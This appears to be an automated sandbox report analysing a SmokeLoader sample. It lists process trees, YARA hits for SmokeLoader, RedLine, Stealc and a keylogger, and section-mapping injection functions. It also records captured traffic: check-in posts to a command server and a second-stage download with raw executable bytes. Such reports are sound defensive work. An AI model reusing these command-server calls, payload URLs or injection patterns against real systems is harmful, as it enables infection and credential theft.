30	192.168.2.6	49751	91.202.233.158	80	6812	C:\Users\user\AppData\Local\Temp\svchost015.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 08:21:22.465679884 CEST	89	OUT	GET / HTTP/1.1 Host: 91.202.233.158 Connection: Keep-Alive Cache-Control: no-cache
Sep 2, 2024 08:21:23.130409002 CEST	203	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 06:21:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 2, 2024 08:21:23.134284973 CEST	415	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIEGDAEHIEHIDHJDAAK Host: 91.202.233.158 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 45 34 34 36 44 41 46 41 45 33 34 31 35 39 34 39 33 34 32 30 34 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 43 46 49 45 47 44 41 45 48 49 45 48 49 44 48 4a 44 41 41 4b 2d 2d 0d 0a Data Ascii: ------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="hwid"7E446DAFAE341594934204------CFIEGDAEHIEHIDHJDAAKContent-Disposition: form-data; name="build"default------CFIEGDAEHIEHIDHJDAAK--
Sep 2, 2024 08:21:23.383081913 CEST	210	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 06:21:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49744	84.32.84.152	443	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-02 06:21:13 UTC	192	OUT	GET /Coin.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: www.darkviolet-alpaca-923878.hostingersite.com
2024-09-02 06:21:13 UTC	533	IN	HTTP/1.1 200 OK Server: hcdn Date: Mon, 02 Sep 2024 06:21:13 GMT Content-Type: application/x-executable Content-Length: 3639176 Connection: close last-modified: Sun, 01 Sep 2024 09:33:03 GMT etag: "378788-66d434cf-b3fea62b77a48d21;;;" platform: hostinger panel: hpanel content-security-policy: upgrade-insecure-requests x-turbo-charged-by: LiteSpeed alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: ae6aa6841d724889bd61bb1041855083-bos-edge3 x-hcdn-cache-status: MISS x-hcdn-upstream-rt: 0.008 Accept-Ranges: bytes
2024-09-02 06:21:13 UTC	836	IN	Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZP@!L!This program must be run under Win32$7
2024-09-02 06:21:13 UTC	1369	IN	Data Raw: 00 d0 37 00 00 00 00 00 00 66 37 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01 00 00 00 00 ff 00 00 00 90 40 10 40 00 01 07 49 Data Ascii: 7f7@P@Boolean@FalseTrue@,@Char@@I
2024-09-02 06:21:13 UTC	1369	IN	Data Raw: e8 56 ff ff ff 84 c0 75 04 33 c0 89 06 5a 5d 5f 5e 5b c3 53 56 57 55 83 c4 f8 8b d8 8b fb 8b 32 8b 43 08 3b f0 72 70 8b ce 03 4a 04 8b e8 03 6b 0c 3b cd 77 62 3b f0 75 1b 8b 42 04 01 43 08 8b 42 04 29 43 0c 83 7b 0c 00 75 48 8b c3 e8 39 ff ff ff eb 3f 8b ce 8b 7a 04 03 cf 8b e8 03 6b 0c 3b cd 75 05 29 7b 0c eb 2a 8b 0a 03 4a 04 89 0c 24 8b 7b 08 03 7b 0c 2b f9 89 7c 24 04 2b f0 89 73 0c 8b d4 8b c3 e8 d0 fe ff ff 84 c0 75 04 33 c0 eb 0c b0 01 eb 08 8b 1b 3b fb 75 81 33 c0 59 5a 5d 5f 5e 5b c3 90 53 56 57 8b da 8b f0 81 fe 00 00 10 00 7d 07 be 00 00 10 00 eb 0c 81 c6 ff ff 00 00 81 e6 00 00 ff ff 89 73 04 6a 01 68 00 20 00 00 56 6a 00 e8 f8 fd ff ff 8b f8 89 3b 85 ff 74 23 8b d3 b8 ec 85 45 00 e8 6c fe ff ff 84 c0 75 13 68 00 80 00 00 6a 00 8b 03 50 e8 d9 Data Ascii: Vu3Z]_^[SVWU2C;rpJk;wb;uBCB)C{uH9?zk;u){*J${{+\|$+su3;u3YZ]_^[SVW}sjh Vj;t#EluhjP
2024-09-02 06:21:13 UTC	1369	IN	Data Raw: 26 fc ff ff 8b 44 24 0c 89 44 24 04 8b 44 24 10 89 44 24 08 83 7c 24 04 00 74 14 8d 54 24 04 b8 fc 85 45 00 e8 91 fa ff ff eb 04 33 c0 89 07 83 c4 14 5f 5e 5b c3 55 8b ec 33 d2 55 68 e2 1a 40 00 64 ff 32 64 89 22 68 cc 85 45 00 e8 39 f9 ff ff 80 3d 4d 80 45 00 00 74 0a 68 cc 85 45 00 e8 2e f9 ff ff b8 ec 85 45 00 e8 8c f9 ff ff b8 fc 85 45 00 e8 82 f9 ff ff b8 28 86 45 00 e8 78 f9 ff ff 68 f8 0f 00 00 6a 00 e8 dc f8 ff ff a3 24 86 45 00 83 3d 24 86 45 00 00 74 2f b8 03 00 00 00 8b 15 24 86 45 00 33 c9 89 4c 82 f4 40 3d 01 04 00 00 75 ec b8 0c 86 45 00 89 40 04 89 00 a3 18 86 45 00 c6 05 c4 85 45 00 01 33 c0 5a 59 59 64 89 10 68 e9 1a 40 00 80 3d 4d 80 45 00 00 74 0a 68 cc 85 45 00 e8 af f8 ff ff c3 e9 71 1d 00 00 eb e5 a0 c4 85 45 00 5d c3 55 8b ec 53 80 Data Ascii: &D$D$D$D$\|$tT$E3_^[U3Uh@d2d"hE9=MEthE.EE(Exhj$E=$Et/$E3L@=uE@EE3ZYYdh@=MEthEqE]US
2024-09-02 06:21:13 UTC	1369	IN	Data Raw: 47 04 8b f3 03 74 24 0c 3b c6 73 08 e8 f0 fd ff ff 01 47 04 8b 07 03 47 04 3b f0 75 11 83 e8 04 ba 04 00 00 00 e8 eb fc ff ff 83 6f 04 04 8b 07 a3 20 86 45 00 8b 47 04 a3 1c 86 45 00 b0 01 83 c4 10 5f 5e 5b c3 8d 40 00 53 83 c4 f8 8b d8 8b d4 8d 43 04 e8 44 f8 ff ff 83 3c 24 00 74 0b 8b c4 e8 57 ff ff ff 84 c0 75 04 33 c0 eb 02 b0 01 59 5a 5b c3 90 53 56 83 c4 f8 8b f2 8b d8 8b cc 8d 56 04 8b c3 e8 a3 f8 ff ff 83 3c 24 00 74 0b 8b c4 e8 26 ff ff ff 84 c0 75 04 33 c0 eb 02 b0 01 59 5a 5e 5b c3 8d 40 00 33 d2 85 c0 79 03 83 c0 03 c1 f8 02 3d 00 04 00 00 7f 16 8b 15 24 86 45 00 8b 54 82 f4 85 d2 75 08 40 3d 01 04 00 00 75 ea 8b c2 c3 53 56 57 55 8b f0 bf 18 86 45 00 bd 1c 86 45 00 8b 1d 10 86 45 00 3b 73 08 0f 8e 84 00 00 00 8b 1f 8b 43 08 3b f0 7e 7b 89 73 Data Ascii: Gt$;sGG;uo EGE_^[@SCD<$tWu3YZ[SVV<$t&u3YZ^[@3y=$ETu@=uSVWUEEE;sC;~{s
2024-09-02 06:21:13 UTC	1369	IN	Data Raw: 05 1c 86 45 00 83 3d 1c 86 45 00 0c 0f 8d 4c 01 00 00 8b 04 24 01 05 20 86 45 00 8b 04 24 29 05 1c 86 45 00 8b f7 e9 33 01 00 00 8b d8 f6 03 02 75 0d 8b c3 8b 50 08 01 14 24 e8 e9 f6 ff ff 83 3c 24 0c 7c 1b 8b dd 03 de 8b 04 24 83 c8 02 89 03 8b c3 83 c0 04 e8 91 f7 ff ff e9 fe 00 00 00 8b f7 e9 f7 00 00 00 8b c6 2b c7 89 44 24 04 3b 1d 20 86 45 00 75 67 a1 1c 86 45 00 3b 44 24 04 7c 53 8b 44 24 04 29 05 1c 86 45 00 8b 44 24 04 01 05 20 86 45 00 83 3d 1c 86 45 00 0c 7d 18 a1 1c 86 45 00 01 05 20 86 45 00 03 35 1c 86 45 00 33 c0 a3 1c 86 45 00 8b c6 2b c7 01 05 b8 85 45 00 8b 45 00 25 03 00 00 80 0b f0 89 75 00 b0 01 e9 a2 00 00 00 e8 3e f9 ff ff 8b dd 03 df f6 03 02 75 4d 8b d3 8b c2 8b 48 08 89 0c 24 8b 0c 24 3b 4c 24 04 7d 0e 03 14 24 8b da 8b 04 24 29 Data Ascii: E=EL$ E$)E3uP$<$\|$+D$; EugE;D$\|SD$)ED$ E=E}E E5E3E+EE%u>uMH$$;L$}$$)
2024-09-02 06:21:13 UTC	1369	IN	Data Raw: 6f fe ff ff eb 12 81 fb 50 80 45 00 74 0a b8 67 00 00 00 e8 5b fe ff ff 8b c6 5e 5b c3 8b c0 53 8a 1a 3a cb 76 02 8b cb 88 08 42 40 81 e1 ff 00 00 00 92 e8 af fe ff ff 5b c3 90 53 56 57 89 c6 89 d7 31 c0 31 d2 8a 06 8a 17 46 47 29 d0 77 02 01 c2 52 c1 ea 02 74 26 8b 0e 8b 1f 39 d9 75 44 4a 74 15 8b 4e 04 8b 5f 04 39 d9 75 37 83 c6 08 83 c7 08 4a 75 e2 eb 06 83 c6 04 83 c7 04 5a 83 e2 03 74 1c 8a 0e 3a 0f 75 2f 4a 74 13 8a 4e 01 3a 4f 01 75 24 4a 74 08 8a 4e 02 3a 4f 02 75 19 01 c0 eb 15 5a 38 d9 75 10 38 fd 75 0c c1 e9 10 c1 eb 10 38 d9 75 02 38 fd 5f 5e 5b c3 8b c0 53 56 51 89 ce c1 ee 02 74 26 8b 08 8b 1a 39 d9 75 45 4e 74 15 8b 48 04 8b 5a 04 39 d9 75 38 83 c0 08 83 c2 08 4e 75 e2 eb 06 83 c0 04 83 c2 04 5e 83 e6 03 74 36 8a 08 3a 0a 75 30 4e 74 13 8a Data Ascii: oPEtg[^[S:vB@[SVW11FG)wRt&9uDJtN_9u7JuZt:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0Nt
2024-09-02 06:21:13 UTC	1369	IN	Data Raw: 8b c0 53 33 db 6a 00 e8 ee ff ff ff 83 f8 07 75 1c 6a 01 e8 e2 ff ff ff 25 00 ff 00 00 3d 00 0d 00 00 74 07 3d 00 04 00 00 75 02 b3 01 8b c3 5b c3 90 55 8b ec 83 c4 f4 0f b7 05 20 60 45 00 89 45 f8 8d 45 fc 50 6a 01 6a 00 68 24 30 40 00 68 02 00 00 80 e8 31 e3 ff ff 85 c0 75 4d 33 c0 55 68 fd 2f 40 00 64 ff 30 64 89 20 c7 45 f4 04 00 00 00 8d 45 f4 50 8d 45 f8 50 6a 00 6a 00 68 40 30 40 00 8b 45 fc 50 e8 06 e3 ff ff 33 c0 5a 59 59 64 89 10 68 04 30 40 00 8b 45 fc 50 e8 e0 e2 ff ff c3 e9 56 08 00 00 eb ef 66 a1 20 60 45 00 66 25 c0 ff 66 8b 55 f8 66 83 e2 3f 66 0b c2 66 a3 20 60 45 00 8b e5 5d c3 00 53 4f 46 54 57 41 52 45 5c 42 6f 72 6c 61 6e 64 5c 44 65 6c 70 68 69 5c 52 54 4c 00 46 50 55 4d 61 73 6b 56 61 6c 75 65 00 00 00 00 db e3 9b d9 2d 20 60 45 00 Data Ascii: S3juj%=t=u[U `EEEPjjh$0@h1uM3Uh/@d0d EEPEPjjh@0@EP3ZYYdh0@EPVf `Ef%fUf?ff `E]SOFTWARE\Borland\Delphi\RTLFPUMaskValue- `E
2024-09-02 06:21:13 UTC	1369	IN	Data Raw: 0e ff 15 14 80 45 00 c3 90 80 3d 28 60 45 00 00 74 17 50 50 52 54 6a 02 6a 00 68 e4 fa ed 0e ff 15 14 80 45 00 83 c4 08 58 c3 8d 40 00 54 6a 01 6a 00 68 e0 fa ed 0e ff 15 14 80 45 00 83 c4 04 58 c3 8d 40 00 80 3d 28 60 45 00 01 76 09 50 ff 73 04 e9 d6 ff ff ff c3 90 80 3d 28 60 45 00 01 76 07 50 53 e9 c4 ff ff ff c3 8d 40 00 85 c9 74 19 8b 41 01 80 39 e9 74 0c 80 39 eb 75 0c 0f be c0 41 41 eb 03 83 c1 05 01 c1 c3 8b c0 80 3d 28 60 45 00 01 76 1d 50 52 51 e8 cf ff ff ff 51 54 6a 01 6a 00 68 e1 fa ed 0e ff 15 14 80 45 00 59 59 5a 58 c3 90 80 3d 28 60 45 00 01 76 12 52 54 6a 01 6a 00 68 e2 fa ed 0e ff 15 14 80 45 00 5a c3 50 52 80 3d 28 60 45 00 01 76 10 54 6a 02 6a 00 68 e3 fa ed 0e ff 15 14 80 45 00 5a 58 c3 8b c0 8b 44 24 04 f7 40 04 06 00 00 00 0f 85 13 Data Ascii: E=(`EtPPRTjjhEX@TjjhEX@=(`EvPs=(`EvPS@tA9t9uAA=(`EvPRQQTjjhEYYZX=(`EvRTjjhEZPR=(`EvTjjhEZXD$@
2024-09-02 06:21:13 UTC	1369	IN	Data Raw: 77 0f 8d 44 24 04 50 e8 24 d8 ff ff 83 f8 00 74 71 8b 44 24 04 fc e8 29 f6 ff ff 8b 54 24 08 6a 00 50 68 3a 3a 40 00 52 ff 15 18 80 45 00 8b 5c 24 04 81 3b de fa ed 0e 8b 53 14 8b 43 18 74 1d 8b 15 10 80 45 00 85 d2 0f 84 fa fe ff ff 89 d8 ff d2 85 c0 0f 84 ee fe ff ff 8b 53 0c e8 16 fb ff ff 8b 0d 04 80 45 00 85 c9 74 02 ff d1 8b 4c 24 04 b8 d9 00 00 00 8b 51 14 89 14 24 e9 ba 03 00 00 31 c0 c3 8d 40 00 31 d2 8d 45 f4 64 8b 0a 64 89 02 89 08 c7 40 04 f4 39 40 00 89 68 08 a3 3c 86 45 00 c3 8d 40 00 31 d2 a1 3c 86 45 00 85 c0 74 1c 64 8b 0a 39 c8 75 08 8b 00 64 89 02 c3 8b 09 83 f9 ff 74 08 39 01 75 f5 8b 00 89 01 c3 55 8b ec 53 56 57 bf 38 86 45 00 8b 47 08 85 c0 74 48 8b 5f 0c 8b 70 04 33 d2 55 68 22 3b 40 00 64 ff 32 64 89 22 85 db 7e 12 4b 89 5f 0c 8b Data Ascii: wD$P$tqD$)T$jPh::@RE\$;SCtESEtL$Q$1@1Edd@9@h<E@1<Etd9udt9uUSVW8EGtH_p3Uh";@d2d"~K_

Target ID:	0
Start time:	02:20:12
Start date:	02/09/2024
Path:	C:\Users\user\Desktop\oZB7n3wuNk.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\oZB7n3wuNk.exe"
Imagebase:	0x400000
File size:	413'184 bytes
MD5 hash:	A4BC249DC997DF25A0E709EEE0A0DF87
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:20:17
Start date:	02/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:20:36
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Roaming\birajci
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\birajci
Imagebase:	0x400000
File size:	413'184 bytes
MD5 hash:	A4BC249DC997DF25A0E709EEE0A0DF87
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2404618518.00000000006E8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2404360688.0000000000670000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 63%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	02:21:15
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Local\Temp\9A25.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\9A25.exe
Imagebase:	0x7ff7934f0000
File size:	3'639'176 bytes
MD5 hash:	17D51083CCB2B20074B1DC2CAC5BEA36
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000006.00000002.2794045093.0000000003019000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 38%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:21:20
Start date:	02/09/2024
Path:	C:\Users\user\AppData\Local\Temp\svchost015.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\svchost015.exe
Imagebase:	0x400000
File size:	2'990'472 bytes
MD5 hash:	B826DD92D78EA2526E465A34324EBEEA
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000007.00000002.2809296945.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\svchost015.exe, Author: Joe Security
Antivirus matches:	Detection: 4%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:21:48
Start date:	02/09/2024
Path:	C:\Windows\System32\WerFault.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WerFault.exe -u -p 4004 -s 9264
Imagebase:	0x7ff72b340000
File size:	570'736 bytes
MD5 hash:	FD27D9F6D02763BDE32511B5DF7FF7A0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:21:50
Start date:	02/09/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	explorer.exe
Imagebase:	0x7ff609140000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	49.6%
Total number of Nodes:	117
Total number of Limit Nodes:	2

Executed Functions

Function 00401476 Relevance: 10.7, APIs: 7, Instructions: 228
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
Instruction ID: 2930413ebcf3c91ef78c7b899968c143e4494e66a1317453e42a44ae66849b54
Opcode Fuzzy Hash: 3de5b02cb2e2c7fa4e7952543349b328c549b7155b269d87397cbf519a09e258
Instruction Fuzzy Hash: AB7190B1900245AFEB209F51CC49F9FBBB8FF82710F10416AF951AB2E1E7719941CB64

Function 00401493 Relevance: 10.7, APIs: 7, Instructions: 207
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
Instruction ID: d7c6057c418d322157b37bade1bff21ef7bff7238e112bc1c960839226febb51
Opcode Fuzzy Hash: 6b07d0daf0981b339e06f51f2dc12d8e52020dd5ac61decf53fb611ec55e13ca
Instruction Fuzzy Hash: 41616571900205FBEB209F91CC49FAF7BB8FF85710F10812AF952BA1E5D6B49901DB65

Function 004014AA Relevance: 10.7, APIs: 7, Instructions: 175
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

Source File: 00000000.00000002.2178741464.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_oZB7n3wuNk.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
Instruction ID: 384a0da1d92476b1279baf81ca3941c4d16b4b8eb8340d8fd65a4e2b9f3dfa72
Opcode Fuzzy Hash: 5e7c5bef6aecb5ec5585bbfc0cc73ac8645d9480793bf840b238ab738a0ec3f8
Instruction Fuzzy Hash: B6513D71A00205BFEF209F91CC49FAF7BB8EF85B00F104129F951BA2E5D6B49905CB64

Function 004014B1 Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401552
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040157F
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004015A2
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004015C0
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401601
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401632
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401654

Memory Dump Source

